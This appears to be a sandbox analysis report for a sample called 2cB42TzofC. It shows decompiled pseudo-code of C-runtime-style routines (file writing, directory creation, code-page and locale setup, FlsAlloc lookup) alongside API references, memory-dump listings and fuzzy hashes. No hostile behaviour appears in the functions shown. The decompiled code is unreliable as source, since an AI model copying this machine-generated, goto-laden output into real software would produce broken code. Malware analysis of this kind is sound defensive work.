                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A0CF Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 65%
                                                        			E00A0A0CF(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x1a)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x24;
									if(E00A06DDC(0xa40f50, _t49 + 0x24, 0) == 0) {
										E00A070D6(0xa40f50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0xa33260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0xa33260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}


















                                                        0x00a0a0cf
                                                        0x00a0a0d3
                                                        0x00a0a0d7
                                                        0x00a0a0db
                                                        0x00a0a0e8
                                                        0x00a0a0f2
                                                        0x00a0a0f2
                                                        0x00a0a0f7
                                                        0x00a0a0fc
                                                        0x00a0a0fc
                                                        0x00a0a105
                                                        0x00a0a10a
                                                        0x00a0a158
                                                        0x00a0a161
                                                        0x00a0a163
                                                        0x00a0a165
                                                        0x00a0a169
                                                        0x00a0a16b
                                                        0x00a0a1de
                                                        0x00a0a1e3
                                                        0x00000000
                                                        0x00a0a1e7
                                                        0x00a0a16d
                                                        0x00a0a171
                                                        0x00000000
                                                        0x00a0a179
                                                        0x00a0a17b
                                                        0x00a0a18b
                                                        0x00a0a1d9
                                                        0x00000000
                                                        0x00a0a1d9
                                                        0x00000000
                                                        0x00a0a18b
                                                        0x00a0a171
                                                        0x00a0a10c
                                                        0x00a0a110
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a112
                                                        0x00a0a112
                                                        0x00a0a114
                                                        0x00a0a118
                                                        0x00a0a11a
                                                        0x00a0a11a
                                                        0x00a0a12e
                                                        0x00a0a137
                                                        0x00a0a139
                                                        0x00a0a13b
                                                        0x00a0a13f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a141
                                                        0x00a0a145
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a147
                                                        0x00000000
                                                        0x00a0a18d
                                                        0x00a0a18d
                                                        0x00a0a1a2
                                                        0x00a0a1ab
                                                        0x00a0a1b3
                                                        0x00a0a1bc
                                                        0x00a0a1c1
                                                        0x00a0a1c9
                                                        0x00a0a1c9
                                                        0x00a0a0f7
                                                        0x00000000

                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00A0CE98,00000001,?,?,?,00000000,00A1510E,?,?,?), ref: 00A0A0EC
                                                        • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00A1510E,?,?,?,?,?,00A14BB3,?), ref: 00A0A12E
                                                        • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00A0CE98,00000001,?,?), ref: 00A0A158
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$Handle
                                                        • String ID:
                                                        • API String ID: 4209713984-0
                                                        • Opcode ID: ce2b081d88a7c7af0c7072f56c7eb06e2a8986d5499478ca5799387b5049dce6
                                                        • Instruction ID: 0c256940ddae92391e13b6cfef256989cf5fc7d04676e5ed196a0227fbc81b11
                                                        • Opcode Fuzzy Hash: ce2b081d88a7c7af0c7072f56c7eb06e2a8986d5499478ca5799387b5049dce6
                                                        • Instruction Fuzzy Hash: FC31E07120830D9BDF24CF24ED48B6ABBA8EBA1710F044619F945AB1C1CB75DD49CBA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A3FA Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0A3FA(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00A1E630();
				_t21 = _a4;
				_t8 =  *(E00A0BE6D(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00A0A373(_t21) != 0 || E00A0B85C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00A0A637(_t21, _a12);
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                                                        0x00a0a402
                                                        0x00a0a408
                                                        0x00a0a411
                                                        0x00a0a417
                                                        0x00a0a42b
                                                        0x00a0a433
                                                        0x00a0a471
                                                        0x00a0a477
                                                        0x00a0a47a
                                                        0x00a0a486
                                                        0x00a0a488
                                                        0x00a0a47c
                                                        0x00a0a47c
                                                        0x00a0a47f
                                                        0x00000000
                                                        0x00a0a481
                                                        0x00a0a483
                                                        0x00a0a483
                                                        0x00a0a47f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a41e
                                                        0x00a0a421
                                                        0x00a0a429
                                                        0x00a0a45e
                                                        0x00a0a462
                                                        0x00a0a468
                                                        0x00a0a468
                                                        0x00a0a46d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a429
                                                        0x00a0a48d

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A421
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A454
                                                        • GetLastError.KERNEL32(?,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A471
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2485089472-0
                                                        • Opcode ID: c0b7110d1ac3fee53c4d77d58aaf4a0b395aea4bcabfdfba523a75d6b33388c9
                                                        • Instruction ID: bcf8a38ce9514f3af175fad4ce1a759bb4c4c999d2fe32451632ebf7612aff26
                                                        • Opcode Fuzzy Hash: c0b7110d1ac3fee53c4d77d58aaf4a0b395aea4bcabfdfba523a75d6b33388c9
                                                        • Instruction Fuzzy Hash: BB01F13E60036C65DB21EBB4BC4EBFE735CAF26340F088401F941D60D1C7A2C98286A3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2B303 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A2B303(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xa3e668; // 0xcba178b4
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0xa2b956
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0xa2b956
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E00A2C3F8(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0xdb855708
					E00A2A585(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0xdb855708
					E00A2A585(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00A1EEFA(_v8 ^ _t102);
			}































                                                        0x00a2b303
                                                        0x00a2b30e
                                                        0x00a2b315
                                                        0x00a2b31a
                                                        0x00a2b325
                                                        0x00a2b337
                                                        0x00a2b42f
                                                        0x00a2b42f
                                                        0x00a2b435
                                                        0x00a2b437
                                                        0x00a2b438
                                                        0x00a2b438
                                                        0x00a2b43a
                                                        0x00a2b440
                                                        0x00a2b440
                                                        0x00a2b442
                                                        0x00a2b444
                                                        0x00a2b44d
                                                        0x00a2b450
                                                        0x00a2b45c
                                                        0x00a2b463
                                                        0x00a2b473
                                                        0x00a2b465
                                                        0x00a2b465
                                                        0x00a2b468
                                                        0x00a2b468
                                                        0x00a2b468
                                                        0x00a2b46c
                                                        0x00a2b46c
                                                        0x00000000
                                                        0x00a2b46c
                                                        0x00a2b452
                                                        0x00a2b452
                                                        0x00a2b457
                                                        0x00a2b457
                                                        0x00a2b46f
                                                        0x00a2b46f
                                                        0x00a2b46f
                                                        0x00a2b475
                                                        0x00a2b47b
                                                        0x00a2b47b
                                                        0x00a2b481
                                                        0x00a2b482
                                                        0x00a2b482
                                                        0x00a2b33d
                                                        0x00a2b33d
                                                        0x00a2b33f
                                                        0x00a2b33f
                                                        0x00a2b346
                                                        0x00a2b347
                                                        0x00a2b34b
                                                        0x00a2b351
                                                        0x00a2b357
                                                        0x00a2b37f
                                                        0x00a2b37f
                                                        0x00a2b381
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b360
                                                        0x00a2b364
                                                        0x00a2b376
                                                        0x00a2b376
                                                        0x00a2b378
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2b369
                                                        0x00a2b36b
                                                        0x00a2b36d
                                                        0x00a2b375
                                                        0x00a2b375
                                                        0x00000000
                                                        0x00a2b375
                                                        0x00000000
                                                        0x00a2b36b
                                                        0x00a2b37a
                                                        0x00a2b37a
                                                        0x00a2b37d
                                                        0x00a2b37d
                                                        0x00a2b384
                                                        0x00a2b399
                                                        0x00a2b39f
                                                        0x00a2b3b3
                                                        0x00a2b3ba
                                                        0x00a2b3c9
                                                        0x00a2b3db
                                                        0x00a2b3e2
                                                        0x00a2b3ea
                                                        0x00a2b3ec
                                                        0x00a2b3ec
                                                        0x00a2b3f6
                                                        0x00a2b406
                                                        0x00a2b408
                                                        0x00a2b41f
                                                        0x00a2b40a
                                                        0x00a2b40a
                                                        0x00a2b40a
                                                        0x00a2b40a
                                                        0x00a2b40f
                                                        0x00000000
                                                        0x00a2b40f
                                                        0x00a2b3f8
                                                        0x00a2b3f8
                                                        0x00a2b3fd
                                                        0x00a2b416
                                                        0x00a2b416
                                                        0x00a2b416
                                                        0x00a2b426
                                                        0x00a2b427
                                                        0x00a2b42b
                                                        0x00a2b496

                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A2B328
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: 1ead53668538925b3b7ad82e9a8654bc2f8be771de06524f23e974c6be5d2719
                                                        • Instruction ID: ced3d6c7d3bc74715a9e6775a38c253dabb79b91ae481a563251aa5c806c5584
                                                        • Opcode Fuzzy Hash: 1ead53668538925b3b7ad82e9a8654bc2f8be771de06524f23e974c6be5d2719
                                                        • Instruction Fuzzy Hash: BB4105705042A89FDB22CF689CC4AFABBB9EB55304F1404FDE59A8A143D335AA45DF30
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2AA3C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 30%
                                                        			E00A2AA3C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xa3e668; // 0xcba178b4
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E00A2A768(0x16, "LCMapStringEx", 0xa37374, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00A2AAC4(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xa33260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00A1EEFA(_v8 ^ _t33);
			}








                                                        0x00a2aa3c
                                                        0x00a2aa41
                                                        0x00a2aa42
                                                        0x00a2aa49
                                                        0x00a2aa4c
                                                        0x00a2aa5e
                                                        0x00a2aa63
                                                        0x00a2aa6a
                                                        0x00a2aaad
                                                        0x00a2aa6c
                                                        0x00a2aa89
                                                        0x00a2aa8f
                                                        0x00a2aa8f
                                                        0x00a2aac1

                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,8FE85006,00000001,?,000000FF), ref: 00A2AAAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2568140703-3893581201
                                                        • Opcode ID: dcdb96c7b4dcfbea1d6cf1f1f987903ad52fffcde8e9586b192769186e91ae3b
                                                        • Instruction ID: 6af2cc462f33d42cca3a3f47c4921d95c8a640091b9ddbd3d6db43bd41f130b8
                                                        • Opcode Fuzzy Hash: dcdb96c7b4dcfbea1d6cf1f1f987903ad52fffcde8e9586b192769186e91ae3b
                                                        • Instruction Fuzzy Hash: 14012532504219BBCF129FA4EE02DEE7FA6FF18750F004564FE082A160C7368931EB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2A9DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 21%
                                                        			E00A2A9DA(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0xa3e668; // 0xcba178b4
				_v8 = _t8 ^ _t22;
				_t10 = E00A2A768(0x14, "InitializeCriticalSectionEx", 0xa3736c, 0xa37374); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xa33260(_a4, _a8, _a12);
					 *_t20();
				}
				return E00A1EEFA(_v8 ^ _t22);
			}








                                                        0x00a2a9df
                                                        0x00a2a9e0
                                                        0x00a2a9e7
                                                        0x00a2a9fc
                                                        0x00a2aa01
                                                        0x00a2aa08
                                                        0x00a2aa25
                                                        0x00a2aa0a
                                                        0x00a2aa15
                                                        0x00a2aa1b
                                                        0x00a2aa1b
                                                        0x00a2aa39

                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A2A03F), ref: 00A2AA25
                                                        Strings
                                                        • InitializeCriticalSectionEx, xrefs: 00A2A9F5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: 87623d0d178455cc5479130866b382e8e966dcb317058393eee1f300749f6413
                                                        • Instruction ID: 9966a363d0be46acb330cbd1b7c48f76a566c1ad158bc32f3888096696a2bcd4
                                                        • Opcode Fuzzy Hash: 87623d0d178455cc5479130866b382e8e966dcb317058393eee1f300749f6413
                                                        • Instruction Fuzzy Hash: 04F0B431645218BBCF11AFA8DD06CAE7FA1EF14760F004565FD095A260CB714E11EB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2A87F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 16%
                                                        			E00A2A87F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xa3e668; // 0xcba178b4
				_v8 = _t4 ^ _t18;
				_t6 = E00A2A768(3, "FlsAlloc", 0xa37330, 0xa37338); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xa33260(_a4);
					 *_t16();
				}
				return E00A1EEFA(_v8 ^ _t18);
			}








                                                        0x00a2a884
                                                        0x00a2a885
                                                        0x00a2a88c
                                                        0x00a2a8a1
                                                        0x00a2a8a6
                                                        0x00a2a8ad
                                                        0x00a2a8be
                                                        0x00a2a8af
                                                        0x00a2a8b4
                                                        0x00a2a8ba
                                                        0x00a2a8ba
                                                        0x00a2a8d2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: a3f42c7456b69cd7b27a7a7e0a28d5af0c2430b967279bb4821ff0c9632922e7
                                                        • Instruction ID: f58ae15ebc6c3bebb7f8e6a59cb998625960532a33a05f4a97b5f6ac556ee15e
                                                        • Opcode Fuzzy Hash: a3f42c7456b69cd7b27a7a7e0a28d5af0c2430b967279bb4821ff0c9632922e7
                                                        • Instruction Fuzzy Hash: 08E0EC72A452287B9714EBA89D069EEBB95DB25B10F400565FC055B280CE704E0296D5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A23567 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00A23567(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00A23446(4, "FlsAlloc", 0xa35684, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00A1EFA0();
				return  *_t6(_a4);
			}





                                                        0x00a2357c
                                                        0x00a23581
                                                        0x00a23588
                                                        0x00a2359b
                                                        0x00a2359b
                                                        0x00a2358f
                                                        0x00a23598

                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00A2357C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: FlsAlloc
